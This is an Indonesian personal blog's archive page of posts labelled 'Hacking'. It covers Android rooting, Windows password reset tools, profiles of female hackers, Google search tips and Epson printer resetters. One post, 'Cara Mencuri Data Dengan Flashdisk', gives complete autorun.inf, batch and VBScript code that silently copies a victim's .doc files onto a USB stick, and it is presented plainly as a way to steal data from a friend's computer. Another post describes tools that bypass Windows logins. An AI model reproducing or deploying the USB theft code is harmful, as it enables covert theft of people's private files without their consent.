Tampilkan posting dengan label Hacking. Tampilkan semua posting
Tampilkan posting dengan label Hacking. Tampilkan semua posting

Trik Rooting Android All Type

Trimuda Reog | 11.18 | 0 komentar
Salam pendidikan.....
root android
Jumpa lagi dengan saya untuk menulis dan menulis.... masalahnya sudah lama saya tidak menulis jadi mohon maaf buat sobat yang sempat membaca atau melihat blog ini tidah pernah ter update.
Yaahhh mungkin karena jarang ada koneksi internet ditempatku saat ini,,, maklumlah pegunungan atau hutan rimba. wkkkkwkwkwkwwk. (jadi curhat nihhhh) sorrryyyyy....

Oke langsung aja,,,,
Kenapa sih Android kita perlu di root?? tentunya kita sudah tak pernah asing dengan istilah itu. Tidak usah kita jelaskan karena pasti sobat semua sudah lebih dulu mengetahuinya.
Kalau soal fungsinya... kenapa hp kita di root?? karena akan memudahkan semua applikasi yang kita unduh bisa diinstall di gadget kita, dan kita bisa mempunyai akses penuh atau hak penuh untuk mengoperasikan system gadget kita. bahkan kita bisa mengoprek-ngoprek software kita.... tentunya dengan cara yang safety juga.

Adapun resiko dari melakukan root itu sendiri adalah :
  • Garansi HP akan hilang : Semua vendor ponsel mengatakan bahwa HP android yang telah di root akan hilang masa garansinya, hal ini dikarenakan dengan kita telah me-root hp android kita, kita sudah mengotak-atik file system pada sebuah HP android sehingga vendor tidak mau bertanggung jawab apabila ada kerusakan HP android yang telah di root. Namun jangan khawatir, HP android yang sudah di root bisa kok dikembalikan dalam kondisi semula (unroot). Sehingga HP android masih memungkinkan untuk mendapatkan garansi kembali.
  • Rentan terhadap Virus dan Malware : Untuk masalah ini sepertinya sobat juga harus tau, dan harus tetap waspada untuk tidak sembarangan menginstal program pada hp android sobat, dan jangan lupa untuk memasang antivirus yang dapat sobat instal dari google play seperti : avast, dll.

Cara Root Android

  1. Silahkan download aplikasi framaroot cari pada mbah google
  2. Instal file APK yang telah di download
  3. Masuk ke aplikasi lalu pilih aplikasi yang ingin sobat install untuk root boleh superuser atau super SU
  4. Di menu bawahnya sobat silahkan klik aragom 
  5. Tunggu beberapa saat sampai muncul perintah untuk restart galaxy note sobat.
  6. Restart dan lihat hasilnya, jika sobat menemukan aplikasi superuser/super SU maka itu artinya android sobat sudah berhasil di root.
  7. Selamat sekarang hape android anda sudah berhasil di Root, silahkan nikmatin aplikasi dan game sesuka kamu.

Cara UnRoot Android

  1. Jalankan aplikasi framaroot
  2. Pada menu "Select an action to execute after root", kalian pilih "unroot".
  3. Tunggu beberapa saat android kalian akan kembali seperti semula.

Jenis handphone yang sudah support :

  • Perangkat Qualcomm (Gandalf Exploit) : Asus Padfone 1/2, Asus Padfone Infinity, BW T18+ (Fortis Evo), Cloudfone Thrill 430x, Disgo 8400g, DNS S4504/S4503/S4502, FAEA F1, Gigabyte GSmart G1315 Skate, Gigabyte GSmart Rio R1, Google Nexus 4, Highscreen Spark/Blast/Strike/Boost, HTC One S, Huawei Honor Pro (U8950-1), Huawei U8815/U8816 Ascend G300/G301, Huawei U8825D Ascend G330D, Karbonn Titanium S5, LG Nitro HD, LG L7 II P710/P714/P715, LG Optimus G E970, LG Optimus L3 II E425, LG Optimus L5 E610/612/615, LG Optimus L7 II P710/P713/ P714/P715, LG Optimus L7 P700/ла705, LG Optimus LTE 2, MEDION LIFE P4013, Micromax A111 Canvas Doodle, Orange Nivo, Samsung Galaxy Win I8552, Sharp Aquos Phone SH930W, Sony Xperia E C1505/Dual C1605, Sony Xperia L C210X, teXet TM-3204R, teXet TM-4677, ZTE V880G/ZTE V955
  • Perangkat MT65XX devices (Boromir exploit): Micromax Canvas HD
  • Perangkat Samsung devices (Legolas and Aragorn exploits) : Samsung Galaxy Core GT-I8262, Samsung Galaxy Proclaim S720C, Samsung Galaxy Young GT-S6312/GT-S6310, Samsung Lightray SCH-R940
  • Perangkat Exynos devices (Sam, Frodo, Legolas and Aragorn exploits) : AT&T Galaxy Note 2 SGH-I317, Highscreen Explosion, Hyundai T7s, Impression 9702 (Exynos 4412), Lenovo K860, Newman N2, Meizu MX2, Samsung Galaxy Camera EK-GC100, Samsung Galaxy Note 10.1 GT-N8000, GT-N8010, GT-N8013, GT-N8020, Samsung Galaxy Note 2 GT-N7100, Samsung Galaxy Note 2 LTE GT-N7105, Samsung Galaxy Note 8.0, Samsung Galaxy Note GT-N7000, Samsung Galaxy S GT-i9000, Samsung Galaxy S2 AT&T SGH-I777, Samsung Galaxy S2 Epic 4G Touch - SPH-D710, Samsung Galaxy S2 GT-I9100, Samsung Galaxy S3 GT-I9300, Samsung Galaxy S3 LTE GT-I9305, Samsung Galaxy Tab Plus GT-P6200/GT-P6210, Samsung Galaxy Tab 7.7 GT-P6800/GT-P6810, Samsung SGH-i997 Infuse 4G, T-Mobile Galaxy Note 2 T-889, Verizon Galaxy Note 2 SCH-I605, iBerry Auxus CoreX2 3G and CoreX4 3G
  • Perangkat Omap36XX devices (Gimli exploit) : Archos Gen8, Cliq 2 MB611, Coolpad Quattro 4G, Droid 2 (a955), Droid 2 Global (a956), Droid X (MB810), LG Marquee LS855, LG P970 Optimus Black, Motorola DEFY+ (MB525 / MB526), Motorola Droid PRO, Motorola Droid X, Parrot ASTEROID Smart, R2D2 (a957)

Untuk Gadget sobat yang tidak tertera diatas, kemungkinan bisa dan juga gagal dalam melakukan root. oleh karena itu,silahkan mencobanya terlebih dahulu untuk gadget yang tidak termasuk diatas. 


tags: trik rooting 2014, android, trik android, trik mempercantik android, hack android, modifikasi android, tampilan android, cara root android, cara rooting

Cara Mencuri Data Dengan Flashdisk (iseng)

Trimuda Reog | 14.45 | 1komentar

trik mencuri data
Cara Mencuri Data Dengan Flashdisk === Daripada nganggur gak ada kerjaan, pikiran jenuh, suntuk, bosen, males, semua jadi satu mending kita senang-senang. Ok begini saya akan memberikan tutorial sederhana tapi mantap, nah Flashdisk memang bisa di jadikan pencuri data yang seperti di film-film itu hehehe :D dan Lumayan Buat modal jadi mata-mata kayak James Bond :P OK kita ke TKP COY

Sebelumnya siapin dulu flashdisk kita (kalo bisa minimal 8 GB)




Langkah ke-1
Buka Notepad copy dan paste kode dibawah ini.
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
Kemudian simpanlah di flashdisk dengan nama: autorun.inf

Langkah ke-2
Buka Notepad lagi dan copas kode berikut:
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\My Documents\*.doc" "%drive%\all
\doc"
@echo off
cls

Simpan di flashdisk anda dengan nama:file.bat

Langkah ke-3
Buka Notepad lagi dan copas kode berikut:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0)
& """", 0, False
Simpan di flashdisk anda dengan nama:invisible.vbs

Langkah ke-4
Buka Notepad lagi dan copas lagi kode berikut:
wscript.exe \invisible.vbs file.bat
Simpan di flashdisk anda dengan nama:launch.bat

Ok, sekarang pastikan ke-4 file tadi yang telah kita buat berada di flashdisk kita, dan buatlah
folder baru dengan nama all untuk menyimpan hasil curian kita di komputer teman tadi, dimana perintah: %backupcmd% “%USERPROFILE%\My Documents\*.doc” “%drive%\all
\doc” , akan menyalin semua file ber-ekstensi .doc kedalam folder “all/doc” yang berada di flashdisk kita secara otomatis waktu kita mencolokkan flashdisk kita dikomputernya ataupun dia sendiri yang mencolokkannya dikomputernya sendiri.

Sebelum mencoba mencuri file dikomputer teman, coba dulu flashdisk kita dikomputer kita sendiri, lihat apakah bekerja dengan baik. Selamat mencoba Semoga Berhasil ya.jangan terlalu iseng cooyyy






tags: trik mencuri data, trik, data, mencuri, flashdisk

Windows Password Recovery/ Kehilangan Password

Trimuda Reog | 22.02 | 0 komentar
Windows password recovery adalah alat yang dapat anda gunakan untuk memulihkan, atau reset lost user dan password administrator yang digunakan untuk log on ke sistem operasi Windows.

Catatan: Menggunakan program Windows password recovery hanyalah salah satu dari beberapa cara untuk menemukan password yang hilang Windows.

Berikut adalah 7 Windows Password Recovery tools gratis yang tersedia yang dapat anda gunakan ketika anda lupa akan password di Windows 7 anda.

ophcrack 4 1 7 Windows Password Recovery Tool GratisOphCrack Windows password cracker yang terbaik dari Windows password recovery tool selain itu proses yang dilakukan sangat cepat dan  mudah bagi seorang cracker password Windows pertama kali dengan pengetahuan dasar Windows.
Dengan Ophcrack, Anda tidak membutuhkan akses ke Windows untuk dapat memulihkan password hilang. Cukup kunjungi situs, download gratis ISO image, burn ke CD dan boot dari CD tersebut. Program Ophcrack akan start, menempatkan account pengguna Windows, dan hasil untuk memulihkan (crack) password – semua secara otomatis.
Dalam tes pada PC Windows 7, Ophcrack recovery dengan password 10-karakter untuk account administrator hanya dalam 40 detik ter-recovery. Ophcrack mendukung Windows 7, Windows Vista, dan Windows XP.
offline nt password 05 upd 7 Windows Password Recovery Tool GratisOffline NT Password & Registry Editor bekerja secara berbeda dari program password recovery yaitu akan menghapus password Windows anda, bukan untuk memulihkan. Anda dapat menganggapnya sebagai lebih dari alat reset password Windows.
Seperti Ophcrack, anda boot ke CD dibakar dibuat dengan NT Offline Password & Registry Editor file ISO. Setelah menjalankan program, Anda dapat log in ke account Windows Anda tanpa memasukkan password sama sekali.
Jika anda menginginkan alat untuk menhapus password, strategi ini yang saya sangat merekomendasikan. Offline NT Password & Registry Editor pada dasarnya bekerja dengan cara yang sama seperti PC Login Now.
Aku mencoba Offline NT password & Registry Editor pada Windows 7 PC support Windows 7, Windows Vista, Windows 2000, dan Windows NT. Dan bekerja pada OS 64-bit.
pcloginnow08 7 Windows Password Recovery Tool GratisPC Login Now adalah salah satu program gratis yang lebih baik dari Windows password recovery, meskipun tidak benar-benar memulihkan password.
Cara kerja PC Login Now adalah dia akan menghapus password da memungkinkan anda untuk mengakses Windows tanpa password, setelah itu anda dapat membuat password yang baru.
PC Login Now bekerja seperti Offline NT Password & Registry Editor (yang tercantum di atas) hanya saja lebih mudah untuk digunakan.
PC Login Now mendukung Windows 7, Windows Vista, dan Windows XP.
kon boot 1 7 Windows Password Recovery Tool Gratis
Kon-Boot adalah satu lagi program gratis untuk reset password, seperti ONTP & RE dan PC Login Now. Caranya cukup anda burning program ke disk, selanjutnya anda lakukan boot PC.
Kon-Boot bekerja secara berbeda dari dua alat reset password di atas, jadi jika anda memiliki masalah menggunakan mereka, anda bisa gunakan Kon-Boot untuk mencobanya. Ini sangat, sangat mudah digunakan dan mungkin reset sandi tercepat, dan tentunya password recovery, alat yang tersedia.
Kon-Boot 1,0 tidak bekerja dengan 64-bit versi Windows.






tags: kehilangan pasword laptop, pasword lupa, lupa pasword, login lupa, windows terkunci, cara membuka pasword, cara hack, hack pasword, pasword laptop, notebook, hp, email, pasword, kata kunci

Tema Windows 7 Keren (Angry Birds)

Trimuda Reog | 13.23 | 0 komentar
Download Tema Windows 7 Keren (Angry Birds) == Angry Birds merupakan sebuah permainan yang sangat populer sejak diluncurkannya dan tersedia pada berbagai platform termasuk Windows. Anggota Deviantart telah menciptakan Angry Birds Skin Pack untuk Windows 7 yang datang dengan tema kustom, suara, background, layar logon, roket dock dan fitur lainnya. Tema tersedia untuk versi 32 bit dan 64 bit.



Kemasan skin memiliki start menu dan taskbar yang dirancang khusus dengan warna permainan dan gambar jadi ini akan terlihat benar benar nyata.




Cukup anda download Tema Windows 7 Keren (Angry Birds) dan install tetapi sebelum anda install pastikan anda membuat sebuah restore point ini untuk menjaga jika terjadi sesuatu ketika anda ingin kembali ke tampilan Windows anda.

Silahkan Download Tema Windows 7 Keren (Angry Birds) gratis dari blog ini.

Untuk link download Tema Windows 7 Keren (Angry Birds) bisa klik Download

Semoga bermanfaat



Google Mundur Gara-gara Hacker Cantik

Trimuda Reog | 12.41 | 1komentar

Hacker Cantik dari Negeri China.

Xiao Tian

Google menyatakan siap mengundurkan diri dari China dan menutup seluruh operasional mereka di sana. Alasannya, raksasa mesin pencari itu sudah tidak tahan dengan gelombang serangan yang dilancarkan para hacker asal negeri tirai bambu tersebut.

XIAAO TIAN














XIAO TIAN????

David Drummond, Senior Vice President, Corporate Development and Chief Legal Officer Google menyebutkan, pihaknya mendapati adanya ‘serangan yang sangat canggih’ yang berasal dari China terhadap infrastuktur Google.

“Serangan-serangan ini membuat kami memutuskan untuk meninjau kelayakan operasi bisnis kami di China,” sebut Drummond blog resmi Google, 12 Januari 2010.

Langkah Google yang memilih mundur dari China menunjukkan dahsyatnya komunitas hacker di negeri tersebut.

Sampai Juli 2008, diperkirakan terdapat 4 juta orang hacker yang tergabung dalam berbagai komunitas hacker. Salah satunya adalah kelompok hacker khusus wanita yang menamakan diri Cn Girl Security Team.

Kelompok hacker ini dipimpin oleh gadis kelahiran Hunan, 6 September 1989 bernama Xiao Tian.

Dalam benak, kita mungkin membayangkan bahwa tipikal seorang hacker adalah remaja yang beranjak dewasa, dengan penampilan seadanya – kalau tidak dibilang buruk rupa – dengan kacamata tebal, perokok berat, rambut acak-acakan tak terawat dan jarang mandi karena menghabiskan sebagian besar hidupnya di depan komputer.

Ternyata tidak demikian dengan Xiao Tian. Meski menyebutkan ia sering begadang dan sesekali merokok, tetapi penampilannya sangat apik. Sepintas, melihat penampilannya, Anda mungkin tak akan menyangka bahwa ia merupakan pimpinan dari kelompok hacker yang anggotanya mencapai lebih dari 2.200 orang hacker wanita.

Xiao Tian menyebutkan, ia membuat kelompok tersebut karena ia merasa bahwa perlu ada tempat bagi gadis remaja sepertinya, yang merasa tersingkirkan dari dunia hacker yang disesaki oleh hacker pria yang menganggap bahwa hacker wanita tidak memiliki skill yang cukup.

Perlahan tapi pasti, Xiao Tian dan kelompok hackernya mulai menerobos dominasi pria di dunia hacking. Mereka mengincar status selebritis yang disandang oleh para hacker di China sekaligus membuka peluang ‘karir’ yang menggiurkan yang tersedia bagi hacker yang memiliki reputasi tinggi.

Meski anggota klub hacker Xiao Tian masih relatif kecil dibandingkan dengan populasi hacker di China, akan tetapi ‘organisasi’ hackernya mungkin merupakan salah satu kelompok hacker perempuan terbesar di China.

Scott Henderson, seorang pensiunan tentara AS yang merupakan pengamat dan penulis The Dark Visitor: Inside the World of Chinese Hackers pernah menyebutkan pada DNA India. “Aspek unik dari hacker China adalah rasa nasionalisme dan kolektivitas. Ini kontras dengan stereotip hacker barat yang umumnya mandiri dan bekerja secara individual di ruang bawah tanah tempat tinggal mereka,” ucapnya.

Akan tetapi, belakangan, kecenderungan yang terjadi adalah ‘tentara cyber’ tersebut terpecah-pecah dan membentuk kriminal kapitalis dan mulai meninggalkan rasa nasionalisme mereka.

Meski demikian, Henderson menyebutkan, suatu saat jika ada konflik yang melibatkan China, hacker tentu akan memobilisasi kelompok mereka dan terlibat dalam perang dunia maya. Dan jika saatnya tiba, ‘jenderal’ Xiao Tian mungkin akan menjadi salah satu pemimpin pasukan tentara China tersebut ...


Source: fb

5 Hacker dan Kracker Paling Cantik Dunia (update)

Trimuda Reog | 20.36 | 9komentar
Apa yang ada dalam benak Sobat jika mendengar kata hacker? Orang berpenampilan layaknya kutu buku dengan kacamata tebal? Singkirkan dulu bayangan tersebut. Karena ternyata, 5 hacker cewek ini mungkin bisa mengubah pandangan Sobat.


Hacker dan Cracker Cantik nan Seksi


1. Cristina Svechinskaya

Ia adalah seorang mahasiswi di New York University. Kristina sempat populer karena keberhasilannya membobol jutaan dolar dari beberapa bank di Inggris dan Amerika Serikat.

Bersama dengan 9 orang lainnya, Kristina menyedot uang dari ribuan akun bank sebelum akhirnya tertangkap pada November 2010. Hacker cantik ini menggunakan virus Zeus Trojan Horse untuk menyerang akun-akun tersebut. Banyak orang sepakat bahwa ia merupakan salah satu hacker terseksi yang pernah ada.


2. Ying Kracker


Wajahnya yang manis dan terlihat polos membuat orang tak mungkin berpikir bahwa Ying adalah seorang hacker. Ying sendiri berprofesi sebagai guru di Shanghai, China.

Ia mengajarkan langkah-langkah dasar dari proses hacking, seperti bagaimana mengganti IP Address dan bagaimana memanipulasi password. Ying juga merupakan seorang ahli dalam membuat software khusus hacker.


3. Joanna Rutkowska


Joanna adalah wanita asal Polandia yang sangat tertarik dengan dunia hacking. Namun bedanya, ia lebih memfokuskan diri pada bagaimana membangun sistem keamanan untuk mencegah terjadinya kejahatan tersebut.

Wanita cantik ini pertama kali dikenal saat acara Black Hat Briefings di Las Vegas pada Agustus 2006. Saat itu ia mempresentasikan diri dengan membobol sistem keamanan di Windows Vista. Tidak hanya itu, Joanna juga berhasil menerobos Intel System Management Mode dan Trusterd Execution Technology.

Sejak itu, Joanna sering diundang oleh berbagai perusahaan software untuk memberi saran soal sistem keamanan mereka.


4. Raven Adler


Gadis bergaya gothic ini menjadi wanita pertama yang melakukan presentasi di DefCon Hacker Conference. Namun ia berpendapat bahwa dirinya tidak ingin dikenal hanya sebagai seorang hacker wanita.

Raven lebih senang jika populer karena kemampuannya sebagai hacker diakui oleh orang lain. Belakangan, ia cukup aktif mendesain, mengetes, dan mengaudit pendeteksi keamanan di berbagai agency.


5. Xiao Tian


Hacker berwajah oriental ini tampil elegan dan modis. Penampilannya yang feminim berbanding terbalik dengan kemampuannya membobol sistem keamanan. Xiao Tian memang mengaku sangat tertarik pada dunia fashion.

Ia pertama kali dikenal saat berumur 19 tahun. Salah satu korbannya tidak lain adalah perusahaan pemilik search engine terbesar di dunia, Google. Saat itu, Xiao Tian bersama timnya menyerang sistem infrastruktur dari Google China.

{sumber}

Cantik Kann????

Melindungi Data Dari Pencurian

Trimuda Reog | 11.28 | 1komentar
Melindungi data dari pencurian lewat flashdisk merupakan hal yang  harus kita ketahui jika kita memiliki data-data yang penting. Untuk melindungi data tersebut tidak usah pakay sofware atau apalah karena windows sendiri mempunyai banyak celah yang harus dimanfaatkan sebaik mungkin. Langsung saja kita praktekkan.


Berikut langkah-langkahnya :
1. Masuk ke Regedit ( Tekan Tombol Windows+R lalu ketik regedit)
2. Masuk ke HEY_LOCALMACHINE\SYSTEM\CurrentControlSet\Control\
3. Klik kanan pada folder Control pilih New–>Key
4. Beri nama folder baru itu dengan “StorageDevicePolicies”
5. Lalu klik kanan di folder dengan nama “StorageDevicePolicies”,
    lalu pilih New–>Dword
6. Beri nama “WriteProtect”
7. Klik 2x Dword dengan nama “WriteProtect” tersebut, lalu ganti Value
    Data menjadi 1
8. Restart Komputer anda


Silahkan di tes dengan meng-copy sebuah file atau musik, atau data.
Selamat mencoba semoga bermanfaat sobat...


Nb: untuk mengembalikan seperti semula, bisa hapus folder yang telah kita buat tadi atau pakai microsoft fix it.

Trik Google Ampuh Terbaru (update)

Trimuda Reog | 09.18 | 4komentar

Trik ampuh google terbaru (update)+++!! Tidak bisa dipungkiri bahwa mbah google ini memang mesin pencari yang handal, boleh dikatakan dia adalah penguasa segala informasi. Namun, terkadang informasi yang kita dapatkan kurang relevan dengan apa yang kita cari. Sudah berjam2 kita mencari sesuatu malah tidak ketemu-ketemu, jengkel kan? Apalagi kita pergi ke warnet? Huh, sudah banyak waktu yang dibuang malah informasi gak ada yang cocok. Nah, untuk menghindari itu semua saya mencoba share beberapa trik ampuh mesin google.

1. Gunakan (sinonim) keyword berbeda tapi artinya sama
Bagaimanapun informasi di internet itu dibuat oleh manusia. Cara manusia mengungkapkan sesuatu yang sama, bisa saja dengan bahasa yang berbeda. Misalnya: membuat HP, bisa saja ada orang yang menulis artikel membuat komputer dengan ejaan lain semacam merakit HP atau rakitan HP.
Jadi jika pencarian informasi sobat tidak kunjung berhasil coba pikirkan keyword-keyword lain yang kiranya artinya sama. Trik google yang satu ini membutuhkan kemampun sobat dalam berbahasa, ya katakanlah semacam sinonim.

2. Malu Bertanya Sesat di jalan (gunakanlah questios pada keyword)
Jika sobat sedang menggunakan google untuk menjawab pertanyaan? Cobalah juga gunakan kalimat tanya untuk melakukan pencarian informasi.
  • Siapa itu Adolf hittler
  • Apa rumus pytaghoras
  • Bagaimana cara menggunakan proxy
  • Bagaimana cara menggunakan google
hasilnya dengan trik google yang satu ini adalah selain lebih relevan juga pertanyaan sobat langsung terjawab bukan !?

3. Paksa Google dengan “tanda kutip” (modus pemaksaan)
Umpamanya google sobat suruh-suruh untuk mencari informasi kematian tokoh manga. Dia mungkin tidak akan memberikan hasil persis sesuai yang kita minta. Hasil pencarian mungkin akan menjadi seperti ini “kematian bla bla bla….tokoh di manga bla…bla”. OK! hasil seperti itu memang tidak bisa disalahkan karena ada faktor lain daripada hanya sekedar rangkaian keyword dalam menentukan informasi yang relevan.
Nah supaya menghasilkan pencarian informasi sesuai rangkaian keyword yang diinginkan. Gunakan salah satu trik google yaitu Tanda kutip (” keyword “) menjadi “kematian tokoh manga”. Dengan cara seperti ini akan mengurangi hasil pencarian ditambah informasi yang ditampilkan akan semakin relevan

4. Gunakan tanda Plus (+) dan Min (-)
Bukan hanya di aritmatika ada penjumlahan dan pengurangan :) . Google juga bisa kok. tentu saja  fungsinya juga sama. Rahasia Google ini sangat jarang padahal sudah jelas-jelas ditulis di bagian HELP.
Tanda (+)
untuk menambahkan kata yang ingin dicari pada pencarian informasi. misalkan “kematian tokoh manga” (ingat pakai
tanda  kutip) lalu khusus untuk tokoh naruto saja . Maka cukup sobat tulis dikematian tokoh manga+naruto. Hasilnya selain mencari keyword “kematian tokoh manga” google juga akan menempatkan hasil pencarian teratas jika ada keyword “naruto”.
Tanda (-)
Tentu saja digunakan untuk mengurangi hasil pencarian. Lalu apa gunanya? kenapa kita harus mengurangi hasil pencarian.Ini dikarenakan google mengindex semua halaman yang dianggapnya penting. Tidak peduli apakah itu sebenarnya hanya iklan, berita, bookmarking dsb.
Coba sobat bayangkan kita akan mencari soal psikotes. tapi yang muncul hanya iklan dari orang yang menjual soal psikotes. Maka dari itu dan oleh karena itu kita gunakan tanda – untuk menghilangkan iklan. Menjadi soal psikotes -iklan.
Bisa juga sobat menggunakan google supaya tidak mencari di situs tertentu. Terutama situs iklan baris atau situs bookmarking semacam digg.com atau lintasberita.com. contohnya soal psikotes – site:lintasberita.com

5. Mencari gambar dengan resolusi yang diinginkan

Kalau mencari gambar di Google menurut resolusinya, ini sangat berguna sekali jika kita mencari wallpaper di "google images" disesuaikan layar monitor kita contohnya :

misal layar monitor kita resolusinya 1280x800pixel, dan kita mau mencari wallpapaer soccer yang berukuran segitu. Ketik saja di google images search :

Soccer imagesize:1280x800 (mencari walpaper "soccer" dengan resolusi 1280x800 px)

6. Menggunakan karakter (~)
Kalau sobat mencari sesuatu/ googling tapi kata kuncinya kurang/ lupa pakai saja karakter (~). contohnya jika ingin mencari lagu saosin akan tetapi lupa albumnya ketikkan gini aja sob:
Highway Chance~Album

7. Cari dalam rentang numerik dengan menggunakan titik dua (..)

Jika Sobat ingin mencari informasi tentang Piala Dunia Sepak Bola peristiwa yang terjadi di tahun 1980-an, Sobat bisa menggunakan pencarian ini:

World Cup Soccer 1971..1988

8. Konversi mata uang dengan cepat

Google juga dapat melakukan konversi mata uang, misalnya:

150 rupiah in dollars

9. Memeriksa waktu saat ini pada negara manapun di dunia

Fitur ini memungkinkan Sobat untuk memeriksa waktu saat ini negara atau kota di dunia sehingga Sobat tidak menelepon seseorang di tengah malam. Untuk memeriksa waktu, cukup masukkan (waktu) (spasi) dengan (nama kota). Sebagai contoh:

time Malaysia

10. Menggunakan Google sebagai kalkulator

Google telah built-in kalkulator, hanya mencoba memasukkan perhitungan seperti
270 * ((55 / 5 ) + 3), sobat akan melihat hasilnya:
270 * ((55 / 5) + 3) = 3780

Ya, walaupun komputer sobat juga telah dilengkapi kalkulator, tetapi jika sobat menghabiskan sebagian besar hari sobat di dalam browser, mengetik perhitungan sobat ke dalam kotak pencarian browser lebih cepat daripada membuka aplikasi kalkulator sobat.


Oiya, sebagai tambahan yang Cara google menghibur kita, ada dua lagi yang perlu dicoba sobat. Ketikkan “google sphere” pada kotak pencarian google, jangan enter, atau jangan klik search (penelusuran), tapi klik pada “I’m feeling lucky”, atau untuk google.co.id klik pada “Saya lagi beruntung”, dan lihat hasilnya.
Pacman Mainan game packman di google, ternyata bisa, coba buka google.com/pacman. Dan mainkan!

Ini merupakan terusan dari posting cara mencari file tercepat di google sebelumnya! Ok. Sekian dulu trik ampuh google terbaru kali ini semoga bermanfaat (padahal sudah ada sejak aku masih kecil. . . he3x). Amin.

IDM Maximizer Percepat Internet Download Manager

Trimuda Reog | 15.31 | 13komentar
IDM Maximizer adalah perangkat lunak yang sangat berguna bagi kita semua. Dan harus kita akui, bahwa IDM Download Manager sendiri memiliki kualitas yang nomor satu dibanding downdload manager lainnya. Nah, perangkat lunak buatan Amerika ini mampu mengoptimalkan IDM kita sehingga kita bisa lebih maksimal download. Download semakin cepat, file pun cepat kita dapatkan. Tinggal beberapa langkah dari IDM Maximizer saja kita sudah langsung mendapatkan kecepatan download dengan sangat cepat. Langsung saja kita lihat langkah optimasinya sobat.

      1.       Pastikan IDM ada di sistem tray

      2.       Jalankan IDM Optimizer.exe, akan muncul dua pilihan

Maximize Now! (Optimasi IDM pada settingan paling maksimal)
Restore Default (Mengembalikan IDM pada setingan standart)

      3.       Pilih Maximize Now! Akan muncul perintah untuk restart IDM, klik Ok lalu keluar dari settingan IDM 
             Maximizer lalu matikan program IDM sobat.

      4.       Ketika IDM dihidupkan kembali dan berjalan pada sistemtray, maka kecepatan download akan
             berubah maksimal dengan sendirinya.

Sangat simpel kan sobat? Sangat mudah dibandingkan kita setting dengan cara manual.
Untuk download IDM Maximizer silahkan lihat link download dibawah.



Cara Mencari File Tercepat Di Google

Trimuda Reog | 11.49 | 6komentar

Sobat blogger..... salam sejahtera! Daripada nganggur, saya akan share tips n trik googling cepat, kadang kita membutuhkan waktu yang singkat untuk menemukan tips atau suatu cara tertentu. Sehingga kita membutuhkan suatu hal yang cepat dan akurat untuk mencari suatu file atau data.

Pertama, jika sobat ingin mencari tutorial / ebook yang berupa file pdf / doc / docx / odt, tinggal ketik begini :

kata kunci sobat<spasi>filetype:ekstensi_file

Contoh : “Tutorial Komputer” filetype:pdf

Hasil : Akan muncul banyak list file pdf tentang tutorial komputer
NB : Lakukan hal yang sama jika sobat ingin mencari tutorial / ebook yang berupa file doc / docx / rtf ,dll

Kedua, jika sobat ingin mencari film / lagu / ebook / software , ketikkan saja begini di google :

site:nama_file_hosting<spasi>kata kunci sobat<spasi>ekstensi_file

Contoh : site:mediafire.com  “Agnes Monica” mp3

Hasil : Akan muncul banyak list Agnes Monica yang berupa file mp3 yang berasal dari situs mediafire.com
NB : Lakukan hal yang sama jika sobat ingin mencari file film / lagu / ebook / software, dll.

Demikian tutorial cara cari file tercepat di google kali ini. Semoga bermanfaat!


Oiya, google itu juga menghibur loo. lihat aja cara google menghibur kita.

Resetter Printer Epson All In One (Download Multi)

Trimuda Reog | 11.09 | 0 komentar
Multi resetter printer merupakan gabungan reset printer epson stylus, jadi software ini mendukung banyak printer. Lebih praktis dan lebih cocok dimiliki para teknisi printer. Langsung aja kita terangkan sobat semua....
Download Software Resetter Printer Epson All In One, Software resetter untuk printer epson all in one multi guna ini harus dimiliki, jika sewaktu - waktu printer anda tidak bisa print dan blink. Progam SSC Service Utility untuk epson stylus printer ini adalah freeware atau gratis yang bisa mendukung printer seperti tipe Epson Stylus R270, R240, R340, CX2800, CX3900, CX4900, CX5900, C58 / C59, RX640, C2100/2200, RX700, R2400, PM-A700, PM-G720, RX520, CX7800, CX4100, DX3800, CX3800/CX3810, CX3700, C67/68, CX4600, CX5300, CX5100, RX420, RX425, RX620, R1800 dan Photo Editions seperti C87/C88/D88 and Photo Editions, R220/R230, R320, CX4500, CX3650



Resetter Printer Epson All In One memungkinkan anda untuk melakukan banyak banyak hal yang menkjubkan dengan Printer Epson anda :

1. Bekerja secara langsung dengan CSIC di Cartridge printer epson stylus
2. Reset atau menulis ulang chip yang menggunakan perangkat addon khusus
3. Membekukan internal tinta counter
4. Mengatur ulang counter tinta internal bahkan dengan cartridge kosong
5. Memisahkan, membersihkan warna untuk semua inkjet printer epson, mode powerful cleaning
6. Mendukung hot swapping of cartridges
7. Perlindungan counter (bahkan saat tinta sudah penuh)
8. Mendukung lebih dari 100 printer epson yang berbeda

Perangkat lunak ini dapat bekerja pada windows 95 / 98 / ME / 2k2 / XP / Vista dan Windows 7. Bacalah petunjuk dalam file help sebelum melakukan apa - apa dengan printer anda.


Sekian artikel kali ini, semoga bermanfaat bagi sobat semua . . .

Spesial lihat untuk cara reset epson stylus T11



Query : mutli resetter, all in one resetter printer, epsonstylus all resetter, multi guna resetter

Cara Reset Printer Epson Stylus T11

Trimuda Reog | 10.42 | 0 komentar
Cara Reset Printer Epson Stylus T11 :: daripada nganggur mendingan share sedikit ilmu dech.... langsung saja ya bro! Mungkin banyak cara untuk me reset Printer Epson Stylus T11 ini, yaitu ada yang secara manual dan ada juga yang menggunakan Software. Sekarang Saya akan menjelaskan Reset Printer Epson Stylus T11 dengan menggunakan Software, coba kita jelaskan broo............... 

Cara Reset Epson Stylus T11 Menggunakan Software
  • Download software resetter Epson T11 nya. Silahkan Sobat download disini
  • Jalankan program resetter Epson T11 dengan cara klik 2x file "Loader.exe"
  • Selanjutnya ikuti langkah-langkah pada gambar berikut ini : 
 





  1. Check : digunakan untuk cek counter yang maksimal 7800 point, anda dapat melihatnya di main pad counter. Kalau lebih atau mendekati 7800 point berarti printer perlu di reset 
  2. Initialization : digunakan untuk mereset atau mengembalikan kembali ink counter printer ke posisi Nol
  • Setelah selesai matikan printer kemudian nyalakan lagi. Printer akan nyala dengan lampu berwarna hijau penuh. Berarti printer Epson Stylus T11 yang blink tadi sudah siap digunakan kembali
Mungkin itu sedikit Tips/ Cara Reset Printer Epson Stylus T11, perlu di ingat! Software ini berlaku juga  untuk Epson Stylus T10 dan caranya juga sama. Semoga bermanfaat....

